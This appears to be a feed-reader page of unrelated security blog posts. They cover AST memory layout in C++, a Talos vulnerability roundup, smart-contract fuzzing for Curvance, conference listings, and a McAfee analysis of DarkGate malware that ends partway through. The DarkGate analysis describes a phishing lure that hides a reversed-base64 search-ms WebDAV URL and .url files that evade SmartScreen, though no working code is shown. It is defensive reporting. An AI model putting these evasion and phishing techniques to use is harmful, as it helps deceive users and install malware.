Reading view

There are new articles available, click to refresh the page.

The life and times of an Abstract Syntax Tree

By Francesco Bertolaccini

You’ve reached computer programming nirvana. Your journey has led you down many paths, including believing that God wrote the universe in LISP, but now the truth is clear in your mind: every problem can be solved by writing one more compiler.

It’s true. Even our soon-to-be artificially intelligent overlords are nothing but compilers, just as the legends foretold. That smart contract you’ve been writing for your revolutionary DeFi platform? It’s going through a compiler at some point.

Now that we’ve established that every program should contain at least one compiler if it doesn’t already, let’s talk about how one should go about writing one. As it turns out, this is a pretty vast topic, and it’s unlikely I’d be able to fit a thorough disquisition on the subject in the margin of this blog post. Instead, I’m going to concentrate on the topic of Abstract Syntax Trees (ASTs).

In the past, I’ve worked on a decompiler that turns LLVM bitcode into Clang ASTs, and that has made me into someone with opinions about them. These are opinions on the things they don’t teach you in school, like: what should the API for an AST look like? And how should it be laid out in memory? When designing a component from scratch, we must consider those aspects that go beyond its mere functionality—I guess you could call these aspects “pragmatics.” Let’s go over a few of them so that if you ever find yourself working with ASTs in the future, you may skip the more head-scratching bits and go straight to solving more cogent problems!

What are ASTs?

On their own, ASTs are not a very interesting part of a compiler. They are mostly there to translate the dreadful stream of characters we receive as input into a more palatable format for further compiler shenanigans. Yet the way ASTs are designed can make a difference when working on a compiler. Let’s investigate how.

Managing the unmanageable

If you’re working in a managed language like C# or Java, one with a garbage collector and a very OOP type system, your AST nodes are most likely going to look something like this:

class Expr {}
class IntConstant : Expr {
    int value;
}
class BinExpr : Expr {
    public Expr lhs;
    public Expr rhs;
}

This is fine—it serves the purpose well, and the model is clear: since all of the memory is managed by the runtime, ownership of the nodes is not really that important. At the end of the day, those nodes are not going anywhere until everyone is done with them and the GC determines that they are no longer reachable.

(As an aside, I’ll be making these kinds of examples throughout the post; they are not meant to be compilable, only to provide the general idea of what I’m talking about.)

I typically don’t use C# or Java when working on compilers, though. I’m a C++ troglodyte, meaning I like keeping my footguns cocked and loaded at all times: since there is no garbage collector around to clean up after the mess I leave behind, I need to think deeply about who owns each and every one of those nodes.

Let’s try and mimic what was happening in the managed case.

The naive approach

struct Expr {
    virtual ~Expr();
};
struct IntConstant : Expr {
    int value;
};
struct BinExpr : Expr {
    std::shared_ptr lhs;
    std::shared_ptr rhs;
};

Shared pointers in C++ use reference counting (which one could argue is a form of automatic garbage collection), which means that the end result is similar to what we had in Java and C#: each node is guaranteed to stay valid at least until the last object holding a reference to it is alive.

That at least in the previous sentence is key: if this was an Abstract Syntax Graph instead of an Abstract Syntax Tree, we’d quickly find ourselves in a situation where nodes would get stuck in a limbo of life detached from material reality, a series of nodes pointing at each other in a circle, forever waiting for someone else to die before they can finally find their eternal rest as well.

Again, this is a purely academic possibility since a tree is by definition acyclic, but it’s still something to keep in mind.

I don’t know Rust that well, but it is my understanding that a layout roughly equivalent to the one above would be written like this:

enum Expr {
    IntConstant(i32),
    BinExpr(Arc, Arc)
}

When using this representation, your compiler will typically hold a reference to a root node that causes the whole pyramid of nodes to keep standing. Once that reference is gone, the rest of the nodes follow suit.

Unfortunately, each pointer introduces additional computation and memory consumption due to its usage of an atomic reference counter. Technically, one could avoid the “atomic” part in the Rust example by using Rc instead of Arc, but there’s no equivalent of that in C++ and my example would not work as well. In my experience, it’s quite easy to do away with the ceremony of making each node hold a reference count altogether, and instead decide on a more disciplined approach to ownership.

The “reverse pyramid” approach

struct Expr {
    virtual ~Expr();
};
struct IntConstant : Expr {
    int value;
};
struct BinExpr : Expr {
    std::unique_ptr lhs;
    std::unique_ptr rhs;
};

Using unique pointers frees us from the responsibility of keeping track of when to free memory without adding the overhead of reference counting. While it’s not possible for multiple nodes to have an owning reference to the same node, it’s still possible to express cyclic data structures by dereferencing the unique pointer and storing a reference instead. This is (very) roughly equivalent to using std::weak_ptr with shared pointers.

Just like in the naive approach, destroying the root node of the AST will cause all of the other nodes to be destroyed with it. The difference is that in this case we are guaranteed that this will happen, because every child node is owned by their parent and no other owning reference is possible.

I believe this representation is roughly equivalent to this Rust snippet:

enum Expr {
    IntConstant(i32),
    BinExpr(Box, Box)
}

Excursus: improving the API

We are getting pretty close to what I’d call the ideal representation, but one thing I like to do is to make my data structures as immutable as possible.

BinExpr would probably look like this if I were to implement it in an actual codebase:

class BinExpr : Expr {
    std::unique_ptr lhs, rhs;
public:
    BinExpr(std::unique_ptr lhs, std::unique_ptr rhs)
        : lhs(std::move(lhs))
        , rhs(std::move(rhs)) {}   
    const Expr& get_lhs() const { return *lhs; }
    const Expr& get_rhs() const { return *rhs; }
};

This to me signals a few things:

  • Nodes are immutable.
  • Nodes can’t be null.
  • Nodes can’t be moved; their owner is fixed.

Removing the safeguards

The next step is to see how we can improve things by removing some of the safeguards that we’ve used so far, without completely shooting ourselves in the foot. I will not provide snippets on how to implement these approaches in Rust because last time I asked how to do that in my company’s Slack channel, the responses I received were something like “don’t” and “why would you do that?” and “someone please call security.” It should not have been a surprise, as an AST is basically a linked list with extra steps, and Rust hates linked lists.

Up until now, the general idea has been that nodes own other nodes. This makes it quite easy to handle the AST safely because the nodes are self-contained.

What if we decided to transfer the ownership of the nodes to some other entity? It is, after all, quite reasonable to have some sort of ASTContext object we can assume to handle the lifetime of our nodes, similar to what happens in Clang.

Let’s start by changing the appearance of our Expr nodes:

struct BinExpr : Expr {
    const Expr& lhs;
    const Expr& rhs;
};

Now we create a storage for all of our nodes:

vector<unique_ptr> node_storage;
auto &lhs = node_storage.emplace_back(make_unique(...));
auto &rhs = node_storage.emplace_back(make_unique(...));
auto &binexp = node_storage.emplace_back(make_unique(*lhs, *rhs));

Nice! node_storage is now the owner of all the nodes, and we can iterate over them without having to do a tree visit. In fact, go watch this talk about the design of the Carbon compiler, about 37 minutes in: if you keep your pattern of creating nodes predictable, you end up with a storage container that’s already sorted in, e.g., post-visit order!

Variants on a theme

Let’s now borrow a trick from Rust’s book: the Expr class I’ve been using up until this point is an old-school case of polymorphism via inheritance. While I do believe inheritance has its place and in many cases should be the preferred solution, I do think that ASTs are one of the places where discriminated unions are the way to go.

Rust calls discriminated unions enum, whereas C++17 calls them std::variant. While the substance is the same, the ergonomics are not: Rust has first class support for them in its syntax, whereas C++ makes its users do template metaprogramming tricks in order to use them, even though they do not necessarily realize it.

The one feature I’m most interested in for going with variant instead of inheritance is that it turns our AST objects into “value types,” allowing us to store Expr objects directly instead of having to go through an indirection via a reference or pointer. This will be important in a moment.

The other feature that this model unlocks is that we get the Visitor pattern implemented for free, and we can figure out exactly what kind of node a certain value is holding without having to invent our own dynamic type casting system. Looking at you, LLVM. And Clang. And MLIR.

Going off the rails

Let’s take a look back at an example I made earlier:

vector<unique_ptr> node_storage;
auto &lhs = node_storage.emplace_back(make_unique(...));
auto &rhs = node_storage.emplace_back(make_unique(...));
auto &binexp = node_storage.emplace_back(make_unique(*lhs, *rhs));

There’s one thing that bothers me about this: double indirection, and noncontiguous memory allocation. Think of what the memory layout for this storage mechanism looks like: the vector will have a contiguous chunk of memory allocated for storing pointers to all of the nodes, then each pointer will have an associated chunk of memory the size of a node which, as mentioned earlier, varies for each kind of node.

What this means is that our nodes, even if allocated sequentially, have the potential to end up scattered all over the place. They say early optimization is the root of all evil, but for the sake of exhausting all of the tricks I have up my sleeve, I’ll go ahead and show a way to avoid this.

Let’s start by doing what I said I’d do earlier, and use variant for our nodes:

struct IntConstant;
struct BinExpr;
using Expr = std::variant<IntConstant, BinExpr>;


struct IntConstant {
    int value;
};
struct BinExpr  {
    Expr &lhs;
    Expr &rhs;
};

Now that each and every node has the same size, we can finally store them contiguously in memory:

std::vector node_storage;
node_storage.reserve(max_num_nodes);
auto &lhs = node_storage.emplace_back(IntConstant{3});
auto &rhs = node_storage.emplace_back(IntConstant{4});
auto &binexp = node_storage.emplace_back(BinExpr{lhs, rhs});

You see that node_storage.reserve call? That’s not an optimization—that is an absolutely load-bearing part of this mechanism.

I want to make it absolutely clear that what’s happening here is the kind of thing C++ gets hate for. This is a proverbial gun that, should you choose to use it, will be strapped at your hip pointed at your foot, fully loaded and ready to blow your leg off if at any point you forget it’s there.

The reason we’re using reserve in this case is that we want to make sure that all of the memory we will potentially use for storing our nodes is allocated ahead of time, so that when we use emplace_back to place a node inside of it, we are guaranteed that that chunk of memory will not get reallocated and change address. (If that were to happen, any of our nodes that contain references to other nodes would end up pointing to garbage, and demons would start flying out of your nose.)

Using vector and reserve is of course not the only way to do this: using an std::array is also valid if the maximum number of nodes you are going to use is known at compile time.

Ah yes, max_num_nodes. How do you compute what that is going to be? There’s no single good answer to this question, but you can find decent heuristics for it. For example, let’s say you are parsing C: the smallest statement I can think of would probably look something like a;, or even more extremely, just a. We can deduce that, if we want to be extremely safe, we could allocate storage for a number of nodes equal to the amount of characters in the source code we’re parsing. Considering that most programs will not be anywhere close to this level of pathological behavior, it’s reasonable to expect that most of that memory will be wasted. Unfortunately, we can’t easily reclaim that wasted memory with a simple call to shrink_to_fit, as that can cause a reallocation.

The technique you can use in that case, or in the case where you absolutely cannot avoid allocating additional memory, is to actually do a deep clone of the AST, visiting each node and painstakingly creating a new counterpart for it in the new container.

One thing to keep in mind, when storing your AST nodes like this, is that the size of each node will now be equal to the size of the largest representable node. I don’t think that this matters that much, since you should try and keep all of your nodes as small as possible anyway, but it’s still worth thinking about.

Of course, it might be the case that you don’t actually need to extract the last drop of performance and memory efficiency out of your AST, and you may be willing to trade some of those in exchange for some ease of use. I can think of three ways of achieving this:

  1. Use std::list.
  2. Use std::deque.
  3. Use indices instead of raw pointers.

Let’s go through each of these options one at a time.

Use std::list instead of std::vector

Don’t. ‘Nuff said.

Alright, fine. I’ll elaborate.

Linked lists were fine in the time when the “random access” part of RAM was not a lie yet and memory access patterns didn’t matter. Using a linked list for storing your nodes is just undoing all of the effort we’ve gone through to optimize our layout.

Use std::deque instead of std::vector

This method is already better! Since we’ll mostly just append nodes to the end of our node storage container, and since a double-ended queue guarantees that doing so is possible without invalidating the addresses of any existing contents, this looks like a very good compromise.

Unfortunately the memory layout won’t be completely contiguous anymore, but you may not care about that. If you are using Microsoft’s STL, though, you have even bigger issues ahead of you.

Use indices instead of raw pointers

The idea is that instead of storing the pointer of a child node, you store the index of that node inside of the vector. This adds a layer of indirection back into the picture, and you now also have to figure out what vector does this index refer to? Do you store a reference to the vector inside each node? That’s a bit of a waste. Do you store it globally? That’s a bit icky, if you ask me.

Parting thoughts

I’ve already written a lot and I’ve barely scratched the surface of the kind of decisions a designer will have to make when writing a compiler. I’ve talked about how you could store your AST in memory, but I’ve said nothing about what you want to store in your AST.

The overarching theme in this exhilarating overview is that there’s a lot about compilers that goes beyond parsing, and all of the abstract ideas needed to build a compiler need concretizing at some point, and the details on how you go about doing that matter. I also feel obligated to mention two maxims one should keep in mind when playing this sort of game: premature optimization is the root of all evil, and always profile your code—it’s likely that your codebase contains lower-hanging fruit you can pick before deciding to fine-tune your AST storage.

It’s interesting that most of the techniques I’ve shown in this article are not easily accessible with managed languages. Does this mean that all of this doesn’t really matter, or do compilers written in those languages (I’m thinking of, e.g., Roslyn) leave performance on the table? If so, what’s the significance of that performance?

Finally, I wanted this post to start a discussion about the internals of compilers and compiler-like tools: what do these often highly complex pieces of software hide beneath their surface? It’s easy to find material about the general ideas regarding compilation—tokenization, parsing, register allocation—but less so about the clever ideas people come up with when writing programs that need to deal with huge codebases in a fast and memory-efficient manner. If anyone has war stories to share, I want to hear them!

Vulnerabilities in employee management system could lead to remote code execution, login credential theft

Vulnerabilities in employee management system could lead to remote code execution, login credential theft

Cisco Talos’ Vulnerability Research team has disclosed more than a dozen vulnerabilities over the past three weeks, five in a device that allows employees to check in and out of their shifts, and another that exists in an open-source library used in medical device imaging files. 

The Peplink Smart Reader contains several vulnerabilities, including one issue that could allow an adversary to obtain the administrator’s login credentials and the MD5-hashed version of their password. 

Talos also recently helped to responsibly disclose and patch other vulnerabilities in the Foxit PDF Reader and two open-source libraries that support the processing and handling of DICOM files. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

Code execution, information disclosure vulnerabilities in Peplink Smart Reader 

Discovered by Matt Wiseman. 

The Peplink Smart Reader is an internet-connected device associated with the PepXIM Time-Logging and Security System. Companies’ employees use this device to check in and out of their shifts, allowing administrators to keep track of time cards and pay. It also can control access to certain buildings, and even public transportation. 

There are two information disclosure vulnerabilities, TALOS-2023-1863 (CVE-2023-43491) and TALOS-2023-1865 (CVE-2023-45209), that are triggered if an adversary sends a specially crafted HTTP message to the targeted device.  

If successful, the attacker could eventually view the active administrator’s username and MD5-hased password. And in the case of TALOS-2023-1865, it goes a step further, potentially allowing the adversary to view wireless network credentials, network configuration details and SNMP configuration details. 

With those credentials (or admin credentials obtained by other means), an adversary could exploit TALOS-2023-1868 (CVE-2023-40146), a privilege escalation vulnerability in the Smart Reader. An adversary could execute a specially crafted command line argument to cause a limited-shell escape and execute unblocked, default busybox functionality to eventually gain access to an uninhibited root shell. 

TALOS-2023-1866 (CVE-2023-45744) is also triggered by a specially crafted HTTP request, but in this case, could allow an adversary to manipulate certain configuration settings on the device. 

The most serious of the issues Talos discovered in the Smart Reader is TALOS-2023-1867 (CVE-2023-39367), a command injection vulnerability that could allow an attacker to execute arbitrary commands. This vulnerability has a 9.1 CVSS score out of 10. An authenticated attacker can leverage this vulnerability to execute arbitrary commands on the device with root privileges and elevate their access to the vulnerable system. 

Silicon Labs Gecko Platform invalid pointer dereference vulnerability 

Discovered by Kelly Patterson. 

An invalid pointer dereference vulnerability exists in the HTTP server header parsing functionality of the Silicon Labs Gecko Platform.  

The Gecko Platform SDK is the collection of Silicon Labs’ wireless software development kits and Gecko Platform into an integrated package. It allows users to develop applications inside Silicon Labs’ internet-of-things software ecosystem. 

TALOS-2024-1945 (CVE-2023-51391) is triggered if an adversary sends the target a specially crafted network packet, which could lead to a denial-of-service condition. 

Incorrect type conversion vulnerability in open-source library for DICOM files 

Discovered by Emmanuel Tacheau. 

There is an incorrect type conversion vulnerability in OFFIS DCMTK, an open-source library often used to manage, store and convert DICOM files. DICOM is the commonly used file type to transfer, send and store medical imaging files, such as X-rays and ultrasounds.  

Hospitals and companies use DCMTK for various purposes, ranging from product testing to being a building block for research projects, prototypes and commercial products. 

TALOS-2024-1957 (CVE-2024-28130) could allow an adversary to execute arbitrary code on the targeted machine if they trick the user into opening a specially crafted file.  

Out-of-bounds write vulnerabilities in Grassroots DICOM library 

Discovered by Emmanuel Tacheau. 

Another open-source library for handling DICOM files, Grassroots DiCoM, contains three out-of-bounds writer vulnerabilities.  

TALOS-2024-1944 (CVE-2024-25569) and TALOS-2024-1935 (CVE-2024-22373) can be triggered if an adversary tricks the target into opening a specially crafted, malicious DICOM file, eventually allowing them to read out-of-bounds memory. 

TALOS-2024-1924 (CVE-2024-22391) works in the same way, but in this case, causes a heap-based buffer overflow, leading to memory corruption.  

Three vulnerabilities in Foxit PDF Reader could lead to arbitrary code execution 

Discovered by KPC. 

Three vulnerabilities exist in Foxit PDF Reader that could allow an adversary to execute arbitrary code on the targeted machine. 

Foxit PDF Reader is one of the most popular pieces of PDF-reading software currently available and aims to have feature parity with Adobe Acrobat Reader. It also includes a browser plugin to allow users to open files in their web browsers.  

TALOS-2024-1959 (CVE-2024-25648) and TALOS-2024-1958 (CVE-2024-25938) are use-after-free vulnerabilities that can be triggered if an attacker tricks a user into opening a malicious, specially crafted PDF. This could also work if the user has the browser plugin enabled and the adversary tricks them into opening an attacker-controlled webpage. These vulnerabilities could lead to a use-after-free issue, potentially leading to memory corruption and arbitrary code execution. 

There is also a type confusion vulnerability, TALOS-2024-1963 (CVE-2024-25575), that could also lead to memory corruption and arbitrary code execution. 

LABScon23 Replay | From Vulkan to Ryazan – Investigative Reporting from the Frontlines of Infosec

During the last couple of years, Hakan Tanriverdi (@hatr) has reported on several large-scale digital espionage and sabotage campaigns, from hacking groups that were later called out by the Department of Justice to companies targeting critical infrastructure in Germany and across Western Europe. In both cases, mistakes in how the attackers set up their infrastructure enabled Hakan’s team to follow their tracks, in some cases right back to their employers. The resulting stories revealed the intersection where covert cyber operations and overt organizational structures meet.

This talk lays out the types of information investigative reporters work with, how they follow and fact-check opaque leads, and how they turn them into portraits of previously unknown actors pulling the strings in cyberspace.

Covering investigations into Turla, Magna Bear and REvil, this talks offers a fascinating insight into how researchers peel back the layers threat actors use to mask their activities.

About the Presenter

Hakan Tanriverdi works as a reporter for Paper Trail Media covering cybersecurity. He mainly focuses on hacking groups and trying to find out who they are working for, on a name- and employer-basis. His investigations tend to be on the more technical side and are assisted by scripts, scrapers and querying databases.

About LABScon 2023

This presentation was featured live at LABScon 2023, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Keep up with all the latest on LABScon 2024 here.

Curvance: Invariants unleashed

By Nat Chin

Welcome to our deep dive into the world of invariant development with Curvance.

We’ve been building invariants as part of regular code review assessments for more than 6 years now, but our work with Curvance marks our very first official invariant development project, in which developing and testing invariants is all we did.

Over the nine-week engagement, we wrote and tested 216 invariants, which helped us uncover 13 critical findings. We also found opportunities to significantly enhance our tools, including advanced trace printing and corpus preservation. This project was a journey of navigating learning curves and accomplishing technological feats, and this post will highlight our collaborative efforts and the essential role of teamwork in helping us meet the challenge. And yes, we’ll also touch on the brain-cell-testing moments we experienced throughout this project!

A collective “losing it” moment, capturing the challenges of this project

Creating a quality fuzzing suite

The success of a fuzzing suite is grounded in the quality of its invariants. Throughout this project, we focused on fine-tuning each invariant for accuracy and relevance. Fuzzing, in essence, is like having smart monkeys on keyboards testing invariants, whose effectiveness relies heavily on their precision. Our journey with Curvance over nine weeks involved turning in-depth discussions on codebase properties into precise English explanations and then coding them into executable tests, as shown in the screenshots below.

Examples of what our daily discussions looked like to clarify invariants

From the get-go, Chris from Curvance was often available to help clarify the code’s expected behavior and explain Curvance’s design choices. His insights always clarified complex functions and behavior, and he always helped with hands-on debugging and checking our invariants. This engagement was as productive as it was thanks to Chris’s consistent feedback and working alongside us the entire time. Thank you, Curvance!

The tools (and support teams) behind our success

Along with Curvance’s involvement, support from our internal teams behind Echidna, Medusa, and CloudExec helped our project succeed. Their swift responses to issues, especially during extensive rebases and complex debugging, were crucial. The Curvance engagement pushed these tools to their limits, and the solutions we had to come up with for the challenges we faced led to significant enhancements in these tools.

CloudExec proved invaluable for deploying long fuzzing jobs onto DigitalOcean. We integrated it with Echidna and Medusa for prolonged runs, enabling Curvance to easily set up its own future fuzzing runs. We pinpointed areas of improvement for CloudExec, such as its preservation of output data, which you can see on its GitHub issue tracker. We’ve already addressed many of these issues.

Echidna, our property-based fuzzer for Ethereum contracts, was pivotal in falsifying assertions. We first used Echidna in exploration mode to broadly cover the Curvance codebase, and then we moved into assertion mode, using anywhere from 10 million to 100 billion iterations. This intense use of Echidna throughout our nine-week engagement helped us uncover vital areas of improvement for the tool, making it easier for it to debug and retain the state of explored code areas.

Medusa, our geth-based experimental fuzzer, complemented Echidna in its coverage efforts for falsifying invariants on Curvance. Before we could use Medusa for this engagement, we needed to fix a known out-of-memory bug. The fix for this bug—along with fixes implemented in CloudExec to help it better preserve output data—critically improved the tool and helped maximize our coverage of the Curvance code. Immediately after it started running, it found a medium-severity bug in the code that Echidna had missed. (Echidna eventually found this bug after we changed the block time delay, likely due to the fuzzer’s non-determinism.)

Our first Medusa run of 48+ hours resulted in a medium-severity bug.

The long and winding road

While we had the best support from the teams behind our tools and from our client that we could have asked for, we still faced considerable challenges throughout this project—from the need to keep pace with Curvance’s continued development, to the challenges of debugging assertion failures. But by meeting these challenges, we learned important lessons about the nature of invariant development, and we were able to implement crucial upgrades to our tools to improve our process overall.

Racing to keep up with Curvance’s code changes

Changes to the Curvance codebase—like function removals, additions of function parameters, adjustments to arguments and error messages, and renaming of source contracts—often challenged our fuzzing suite by invalidating existing invariants or causing a series of assertion failures. Ultimately, these changes rendered our existing corpus items obsolete and unusable, and we had to rebase our fuzzing suite and revise both existing and new invariants constantly to ensure their continued relevance to the evolving system. This iterative process paralleled the client’s code development, presenting a mix of true positives (actual bugs in the client’s code) and false positives (failures due to incorrect or outdated invariants). Such outcomes emphasized that fuzzing isn’t a static, one-time setup; it demands ongoing maintenance and updates, akin to development of any active codebase.

Understanding the rationale behind each invariant change post-rebase is crucial. Hasty adjustments without fully grasping their implications could inadvertently mask bugs, undermining the effectiveness of the fuzzing suite. Keeping the suite alive and relevant is as vital as the development of the codebase itself. It’s not just about letting the fuzzer run; it’s about maintaining its alignment with the system it tests. Remember, the true power of a fuzzing suite lies in the accuracy of its invariants.

Critical tool upgrades and lessons learned

We had to make a significant rebase after the Lendtroller contract’s name was changed to MarketManager in commit a96dc9a. This change drastically impacted our work, as Echidna had just finished 43 days of running in the cloud using CloudExec. This nonstop execution had allowed Echidna to develop a detailed corpus capable of autonomously tackling complex liquidations. Unfortunately, the change rendered this corpus obsolete, and each corpus item caused Echidna worker threads to crash upon transaction replay. With our setup of 15 workers, it took only 14 more transactions that could not be replayed for all the Echidna workers to crash, halting Echidna entirely:

An Echidna crash resulting from not being able to replay corpus item

Our rebase due to Curvance’s code change led to a significant problem: our fuzzers could no longer access MarketManager functions needed to explore complex state, like posting collateral and borrowing debt. This issue prompted us to make crucial updates to Echidna, specifically to enhance its ability to validate and replay corpus sequences without crashing. We also made updates to Medusa to improve its tracking of corpus health and ability to fix start-up panics. Extended discussions about maintaining a dynamic corpus ensued, with our engineering director stepping in to manually adjust the corpus, offering some relief.

We shifted our strategy to adjust to the new codebase’s lack of coverage. We developed liquidation-specific invariants for the codebase version before the contract name change, while running the updated version in different modes to boost coverage. CloudExec’s new features, like named jobs, improved checkpointing of output directories, and checkpointing for failed jobs, were key in differentiating and managing these runs. Despite all these improvements, we let the old corpus go and chose to integrate setup functions into key contracts to speed up coverage. While effective in increasing coverage, this strategy introduced biases, especially in liquidation scenarios, by relying on static values. This limitation, marked in the codebase with /// @coverage:limitation tags, underscores the importance of broadening input ranges in our stateful tests to ensure comprehensive system exploration.

Trials and tribulations: Debugging

The Curvance invariant development report mainly highlights the results of our debugging without delving into the complex journey of investigation and root cause analysis behind these findings. This part of the process, involving detailed analysis once assertion failures were identified, required significant effort.

Our primary challenge was dissecting long call sequences, often ranging from 9 to 70 transactions, which required deep scrutiny to identify where errors and unexpected values crept in. Some sequences spanned up to 29 million blocks or included time delays exceeding 6 years, adding layers of complexity to our understanding of the system’s behavior. To tackle this, we had to manually insert logs for detailed state information, turning debugging into an exhaustive and manual endeavor:

Echidna’s debugging at the beginning of the engagement

Our ability to manually shrink transaction sequences hinged on our deep understanding of Curvance’s system. This detailed knowledge was critical for us to effectively identify which transactions were essential for uncovering vulnerabilities and which could be discarded. As we gained this deeper insight into the system throughout the project, our ability to streamline transaction sequences improved markedly.

Based on our work with combing through transaction sequences, we implemented a rich reproducer trace feature in Echidna, providing us with detailed traces of the system during execution and elaborate printouts of the system state at each step of the transaction failure sequence. Meanwhile, we also added shrinking limits of transaction sequences to Medusa to fix intermittent assertion failures, and we updated Medusa’s coverage report to increase its readability. The stark difference in Echidna’s trace printing after these updates can easily be seen in the figure below:

Echidna’s call sequences with rich traces at the end of the engagement

Finally, we created corresponding unit tests based on most assertion failures during our engagement. Initially, converting failures to unit tests was manual and time-consuming, but by the end, we streamlined the process to take just half an hour. We used the insights we gained from this experience to develop fuzz-utils, an automated tool for converting assertion failures into unit tests. Although it’s yet to be extensively tested, its potential for future engagements excites us!

One lock too many: The story behind TOB-CURV-4

After a significant change to the Curvance codebase, we encountered a puzzling assertion failure. Initially, we suspected it might be a false positive, a common occurrence with major code changes. However, after checking the changes in the Curvance source code, the root cause wasn’t immediately apparent, leading us into a complex and thorough debugging process.

We analyzed the full reproducer traces in Echidna (an Echidna feature that was added during this engagement, as mentioned in the previous section), and we tested assumptions on different senders. We crafted and executed a series of unit tests, each iteration shedding more light on the underlying mechanics. It was time to zoom out to identify the commonalities in the functions involved in the new assertion failures, leading us to focus on the processExpiredLock function. By closely scrutinizing this function, we discovered an important assertion was missing: ensuring the number of user locks stays the same after a call to the function with the “relock” option.

When we reran the fuzzer, it immediately revealed the error: such a call would process the expired lock but incorrectly grant the user a new lock without removing the old one, leading to an unexpected increase in the total number of locks. This caused all forms of issues in the combineAllLocks function: the contracts always thought the user had one more lock than they actually had. Eureka!

This trace shows the increase in the number of user locks after the expired lock is processed:

The trace for the increase in user locks, provided in the full invariant development report in finding TOB-CURV-4

What made this finding particularly striking was its ability to elude detection through the various security reviews and tests. The unit tests, as it turned out, were checking an incorrect postcondition, concealing the bug in its checks, masking its error within the testing suite. The stateless fuzzing tests on this codebase (built by Curvance before this engagement) actually started to fail after this bug was fixed. This highlighted the necessity of not only complex and meticulous testing that validates every aspect of the codebase, but also of continually questioning and validating every aspect of the target code—and its tests.

What’s next?

Reflecting on our journey with Curvance, we recognize the importance of a comprehensive security toolkit for smart contracts, including unit, integration, and fuzz tests, to uncover system complexities and potential issues. Our collaboration over the past nine weeks has allowed us to meticulously examine and understand the system, enhancing our findings’ accuracy and deepening our mutual knowledge. Working closely with Curvance has proven crucial in revealing the technology’s intricacies, leading to the development of a stateful fuzzing suite that will evolve and expand with the code, ensuring continued security and insights.

Take a look at our findings in the public Curvance report! Or dive into the Curvance fuzzing suite, now open through the Cantina Competition! Simply download and unzip corpus.zip into the curvance/ directory, then run make el for Echidna or make ml for Medusa. We’ve designed it for ease of use and expansion. Encounter any issues? Let us know! For detailed instructions and suite extension tips, check the Curvance-CantinaCompetition README and keep an eye out for the /// @custom:limitation tags in the suite.

And if you’re developing a project and want to explore stateful fuzzing, we’d love to chat with you!

Cisco Talos at RSAC 2024

Cisco Talos at RSAC 2024

With RSAC just a week away, Cisco Talos is gearing up for another year of heading to San Francisco to share in some of the latest major cybersecurity announcements, research and news.  

We’ve pulled together the highlights, so you don’t miss out on all things Talos.  

Tuesday, May 5  

Joe Marshall will be presenting on Project Power Up alongside Tara Vasyliv of NPC UKRENERGO on how Talos has helped to protect Ukraine’s power grid from disruptive electronic warfare. Reserve your seat for the 8:30 a.m. session here

Nick Biasini will be giving a lighting talk at the Cisco Booth N-5845 in the North Hall at 3:30 p.m. on the good, the bad and the ugly of ransomware in 2024.  

Wednesday, May 6  

Nicole Hoffman will be signing her children’s book, “The Mighty Threat Intelligence Warrior,” at 12:30 p.m. in the RSA Bookstore located in Moscone South, Esplanade Level.  

Thursday, May 7  

Hoffman will be out again, this time hosting a session on applying past lessons learned in hopes of a better future for identify threat detection at 9:40 a.m. in Moscone West 3022. Reserve a seat for the session here.  

And you can always follow along all week on X and LinkedIn for the latest updates.  

The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen

Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena

McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware. This chain commences with an HTML-based entry point and progresses to exploit the AutoHotkey utility in its subsequent stages. DarkGate, a Remote Access Trojan (RAT) developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018. This malicious software boasts an array of functionalities, such as process injection, file download and execution, data theft, shell command execution, keylogging capabilities, among others. Following is the spread of DarkGate observed in our telemetry for last three months:

Figure 1: Geo-Distribution of DarkGate

DarkGate’s attempt to bypass Defender Smartscreen

Additionally, DarkGate incorporates numerous evasion tactics to circumvent detection. DarkGate notably circumvented Microsoft Defender SmartScreen, prompting Microsoft to subsequently release a patch to address this vulnerability.

In the previous year, CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) was identified and subsequently patched https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 . CVE-2023-36025 is a vulnerability impacting Microsoft Windows Defender SmartScreen. This flaw arises from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files. Cyber adversaries exploit this vulnerability by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen. This year, same way, CVE-2024-21412 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412 ) was identified and patched. This vulnerability is about “Internet Shortcut Files Security Feature Bypass Vulnerability”.

Infection Chain

McAfee Labs has identified two distinct initial vectors carrying identical DarkGate shellcode and payload. The first vector originates from an HTML file, while the second begins with an XLS file. We will delve into each chain individually to unveil their respective mechanisms. Below is the detailed infection chain for the same:

Figure 2: Infection Chain

Infection from HTML:

The infection chain initiates with a phishing HTML page masquerading as a Word document. Users are prompted to open the document in “Cloud View” (shown in the figure below), creating a deceptive lure for unwitting individuals to interact with malicious content.

Figure 3: HTML page

Upon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.

Figure 4: Prompt confirming redirection to Windows Explorer

Upon granting permission and opening Windows Explorer, users encounter a file depicted within the Windows Explorer interface. The window title prominently displays “\\onedrive.live.com,” adding a veneer of legitimacy to the purported “Cloud View” experience.

Figure 5: Share Internet Shortcut via SMB

In our investigation, we sought to trace the origin of the described phishing scheme back to its parent HTML file. Upon inspection, it appears that the highlighted content in the image may be a string encoded in reverse Base64 format. This suspicion arises from the presence of a JavaScript function (shown in the figure below) designed to reverse strings, which suggests an attempt to decode or manipulate encoded data.

Figure 6: Javascript in HTML code

On reversing and base64 decoding the yellow highlighted content in Figure 6, we found:

Figure 7: WebDAV share

The URL utilizes the “search-ms” application protocol to execute a search operation for a file named “Report-26-2024.url”. The “crumb” parameter is employed to confine the search within the context of the malicious WebDAV share, restricting its scope. Additionally, the “DisplayName” element is manipulated to mislead users into believing that the accessed resource is associated with the legitimate “onedrive.live.com” folder, thereby facilitating deception.

Hence, the presence of “onedrive.live.com” in the Windows Explorer window title is a direct consequence of the deceptive manipulation within the URL structure.

